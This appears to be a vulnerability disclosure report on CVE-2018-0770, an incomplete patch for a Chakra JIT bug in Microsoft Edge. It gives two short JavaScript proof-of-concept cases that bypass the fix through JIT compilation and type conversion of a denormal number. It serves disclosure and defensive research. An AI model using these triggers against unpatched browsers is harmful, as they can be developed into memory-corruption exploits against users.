Microsoft Edge Chakra JIT Incomplete Fix

Microsoft Edge Chakra JIT suffers from a bypass vulnerability.


MD5 | a1bcc09777f48b460ea48c8fe2b4e014

Microsoft Edge: Chakra: JIT: Incomplete fix for issue 1365

CVE-2018-0770


It seems this is the patch for the bug.
https://github.com/Microsoft/ChakraCore/pull/4226/commits/874551dd00ff6f404e593c7e0162efb54b953f5a

The following two cases will bypass the fix.

1:
function opt() {
    // Number wrapper object holding a denormal double
    let obj = new Number(2.3023e-320);
    for (let i = 0; i < 1; i++) {
        obj.x = 1;
        obj = +obj;  // unary plus converts the wrapper object to a primitive number
        obj.x = 1;   // property store on a primitive: silently ignored in sloppy mode
    }
}

function main() {
    // call opt repeatedly so the JIT compiles it
    for (let i = 0; i < 100; i++) {
        opt();
    }
}

main();

2:
function opt() {
    // same value as case 1, but starting from a string primitive
    let obj = '2.3023e-320';
    for (let i = 0; i < 1; i++) {
        obj.x = 1;   // property store on a primitive: silently ignored in sloppy mode
        obj = +obj;  // unary plus converts the string to a primitive number
        obj.x = 1;
    }
}

function main() {
    // call opt repeatedly so the JIT compiles it
    for (let i = 0; i < 100; i++) {
        opt();
    }
}

main();


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.




Found by: lokihardt

